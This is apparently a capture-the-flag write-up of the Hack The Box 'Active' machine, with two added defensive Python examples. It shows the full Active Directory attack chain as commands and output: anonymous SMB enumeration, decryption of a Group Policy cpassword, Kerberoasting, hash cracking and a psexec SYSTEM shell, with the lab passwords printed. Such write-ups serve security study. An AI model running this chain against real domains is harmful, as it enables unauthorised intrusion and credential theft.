Port scanning

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.100 >nmap_result
┌──(mikannse㉿kali)-[~/HTB/active]
└─$ cat nmap_result|grep open |awk -F'/' '{print $1}' |tr '\n\r' ','
53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49167,
┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49167 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 16:51 CST
Nmap scan report for 10.10.10.100
Host is up (0.15s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-03 08:41:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 8.1 (96%), Microsoft Windows Vista or Windows 7 SP1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -10m00s
| smb2-time:
| date: 2024-09-03T08:42:48
|_ start_date: 2024-09-03T08:31:52
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.88 seconds

Add active.htb to /etc/hosts. The host is a domain controller, so start with SMB.

SMB

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ smbmap -H active.htb

SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[-] Initializing hosts... <snip>
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[-] Closing connections..

The Replication share is readable, so download that directory recursively.

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ smbclient //active.htb/Replication
Password for [WORKGROUP\mikannse]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
active.htb D 0 Sat Jul 21 18:37:44 2018

5217023 blocks of size 4096. 283777 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget active.htb
┌──(mikannse㉿kali)-[~/HTB/active]
└─$ tree active.htb
active.htb
├── DfsrPrivate
│   ├── ConflictAndDeleted
│   ├── Deleted
│   └── Installing
├── Policies
│   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   │   ├── GPT.INI
│   │   ├── Group Policy
│   │   │   └── GPE.INI
│   │   ├── MACHINE
│   │   │   ├── Microsoft
│   │   │   │   └── Windows NT
│   │   │   │       └── SecEdit
│   │   │   │           └── GptTmpl.inf
│   │   │   ├── Preferences
│   │   │   │   └── Groups
│   │   │   │       └── Groups.xml
│   │   │   └── Registry.pol
│   │   └── USER
│   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│       ├── GPT.INI
│       ├── MACHINE
│       │   └── Microsoft
│       │       └── Windows NT
│       │           └── SecEdit
│       │               └── GptTmpl.inf
│       └── USER
└── scripts

22 directories, 7 files

The interesting file here is Groups.xml.

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

This is the encrypted cpassword of the SVC_TGS user, and it is encrypted with a static, publicly known key, so it can be decrypted directly.

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
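As an added, defender-side example (not part of this write-up, and not the gpp-decrypt tool's code): a small audit script that walks an offline copy of SYSVOL, or the Replication share downloaded above, and reports every Group Policy Preferences item that still carries a cpassword attribute. It does not decrypt anything; the point is to find leftover items so the account can be rotated and the item deleted. The directory layout, GUID, account names and ciphertext in the sample are constructed placeholders.

```python
"""Audit an offline copy of SYSVOL (or the Replication share downloaded above)
for Group Policy Preferences XML files that still carry a cpassword attribute.
Added example, not part of the original write-up."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files whose schema includes a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}


def find_cpasswords(root_dir):
    """Walk root_dir and return one finding per element carrying cpassword.

    A finding records the file, the account the item applies to, the
    'changed' timestamp of the enclosing item, and whether the value is
    empty (an empty cpassword means the password was cleared)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed XML: skip instead of aborting the audit
            # ElementTree has no parent pointers, so build a child->parent map.
            parents = {child: parent for parent in tree.iter() for child in parent}
            for elem in tree.iter():
                cpw = elem.attrib.get("cpassword")
                if cpw is None:
                    continue
                item = parents.get(elem)  # e.g. the <User> around <Properties>
                account = elem.attrib.get("userName") or (
                    item.attrib.get("name", "") if item is not None else "")
                findings.append({
                    "file": os.path.relpath(path, root_dir),
                    "account": account,
                    "changed": item.attrib.get("changed", "") if item is not None else "",
                    "empty": cpw == "",
                })
    return findings


def build_sample_sysvol():
    """Create a constructed SYSVOL-like tree in a temp dir and return its path.

    The layout mirrors Policies/<GUID>/MACHINE/Preferences/Groups from the
    tree listing above; the GUID and the ciphertext are placeholders."""
    root = tempfile.mkdtemp(prefix="sysvol_audit_")
    groups_dir = os.path.join(root, "Policies", "{GUID-PLACEHOLDER}",
                              "MACHINE", "Preferences", "Groups")
    os.makedirs(groups_dir)
    groups_xml = (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
        '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" '
        'name="example.local\\svc_legacy" changed="2018-07-18 20:46:06">'
        '<Properties action="U" cpassword="CONSTRUCTED-CIPHERTEXT" '
        'userName="example.local\\svc_legacy"/></User>'
        '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" '
        'name="example.local\\svc_fixed" changed="2020-01-01 00:00:00">'
        '<Properties action="U" cpassword="" '
        'userName="example.local\\svc_fixed"/></User>'
        '</Groups>\n')
    with open(os.path.join(groups_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(groups_xml)
    # Not a preference file: the audit must ignore it.
    with open(os.path.join(root, "Policies", "GPT.INI"), "w", encoding="utf-8") as fh:
        fh.write("[General]\nVersion=1\n")
    return root


def audit_sample():
    """Build the constructed tree and audit it; returns the findings list."""
    return find_cpasswords(build_sample_sysvol())


if __name__ == "__main__":
    for f in audit_sample():
        verdict = "cleared" if f["empty"] else "NON-EMPTY: rotate the account and delete the item"
        print(f"{f['file']}: {f['account']} (changed {f['changed']}) -> {verdict}")
```

Run it against the real share copy with `find_cpasswords("active.htb")`; the `changed` timestamp is worth reporting because it tells you how long the credential has been sitting in SYSVOL, readable by every domain member.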

But this user has no write access to any share, so psexec cannot give us a shell.

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ impacket-psexec active/SVC_TGS:GPPstillStandingStrong2k18@active.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on active.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.

So go back to the SMB shares; the new user may have more permissions.

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100

SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
<SNIP>
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
[*] Closed 1 connections

Connect to the Users share and find the user flag on the Desktop.

Privilege escalation

Tried GetUserSPNs, but ran into the Kerberos clock-skew problem again; disabling automatic NTP synchronization and syncing to the DC's clock fixed it!

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo timedatectl set-ntp off

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo rdate -n active.htb
Tue Sep 3 21:51:02 CST 2024

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo /usr/bin/impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/svc_tgs -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 03:06:40.351723 2024-09-03 16:33:04.699358
<SNIP>

Save the ticket hash to a file named hash.

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2024-09-03 22:03) 0.2325g/s 2450Kp/s 2450Kc/s 2450KC/s Tiffani143..Thrall
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Ticketmaster1968

Cracked: that is the Administrator password.

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file LPJXoeZj.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service mJGI on 10.10.10.100.....
[*] Starting service mJGI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
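As an added, defender-side example (not part of this write-up): the psexec session above leaves a very recognisable trace on the DC, a new service with a random 4-letter name ("mJGI") whose binary is a random 8-letter executable ("LPJXoeZj.exe") uploaded through ADMIN$. The function below flags System log event 7045 (a service was installed) records matching that shape. The events are constructed dicts shaped like 7045 event data; that the binary is registered as `%systemroot%\<name>.exe` when it is dropped into ADMIN$ is an assumption about the tool, not something shown on the page.

```python
"""Flag new-service events that match the psexec pattern in the session above
(4-letter service name, 8-letter .exe dropped into ADMIN$).
Added example, not part of the original write-up; events are constructed.
Assumption: the service binary is registered as %systemroot%\\<name>.exe when
it is uploaded through the ADMIN$ share."""
import re

# Shape taken from the output above: service "mJGI", binary "LPJXoeZj.exe".
SERVICE_NAME_RE = re.compile(r"^[A-Za-z]{4}$")
IMAGE_PATH_RE = re.compile(r"^%systemroot%\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def is_psexec_like(ev):
    """True for a System log 7045 whose name and image path both match."""
    if ev.get("EventID") != 7045:
        return False
    name_ok = SERVICE_NAME_RE.match(ev.get("ServiceName", "")) is not None
    path_ok = IMAGE_PATH_RE.match(ev.get("ImagePath", "")) is not None
    return name_ok and path_ok


def find_psexec_services(events):
    """Return (host, service name, image path) for every matching event."""
    return [(ev["Computer"], ev["ServiceName"], ev["ImagePath"])
            for ev in events if is_psexec_like(ev)]


# Constructed sample records shaped like 7045 event data.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "DC.active.htb", "ServiceName": "mJGI",
     "ImagePath": "%systemroot%\\LPJXoeZj.exe", "ServiceType": "user mode service",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    # Legitimate agent install: descriptive name, vendor directory.
    {"EventID": 7045, "Computer": "DC.active.htb", "ServiceName": "BackupAgent",
     "ImagePath": "C:\\Program Files\\Vendor\\agent.exe", "ServiceType": "user mode service",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    # Short name, but the binary lives somewhere sensible.
    {"EventID": 7045, "Computer": "WS01.active.htb", "ServiceName": "wsvc",
     "ImagePath": "C:\\Program Files\\Vendor\\wsvc.exe", "ServiceType": "user mode service",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    # Same names, but a service state-change event rather than an install.
    {"EventID": 7036, "Computer": "DC.active.htb", "ServiceName": "mJGI",
     "ImagePath": "%systemroot%\\LPJXoeZj.exe"},
]

if __name__ == "__main__":
    for host, name, path in find_psexec_services(SAMPLE_EVENTS):
        print(f"{host}: service {name} installed from {path}")
```

Pair this with the share-access side: the session above starts with a write to ADMIN$ (event 5145 on the share, if object access auditing is enabled), which is a second, independent signal for the same action.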

Ramblings

Honestly this was all stuff I had seen before; the content is just the SMB plus GetUserSPNs combo played over and over. But I'm still not very familiar with the components that make up a domain, so maybe I should set up a domain environment myself.

Also, here is a reference on SYSVOL: https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/